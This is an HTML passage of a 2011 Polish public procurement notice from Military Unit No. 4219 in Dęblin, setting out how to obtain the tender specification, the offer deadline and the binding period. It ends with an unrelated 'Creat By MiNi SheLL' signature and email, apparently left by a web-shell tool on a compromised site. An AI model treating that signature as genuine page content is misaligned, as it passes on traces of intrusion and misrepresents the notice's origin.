<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa Nr 4219, Lotnisko bud 205, 08-521 Dęblin, pokój nr 4 pocztą po wpłacie 11 zł, na konto nr 15101013390000972231000000. Pisemną prośbę należny przesłać łącznie z dowodem wpłaty..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.12.2011 godzina 12:00, miejsce: Kancelaria Jawna (pok. nr 20) Jednostki Wojskowej Nr 4219, Lotnisko bud 205, 08-521 Dęblin...</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com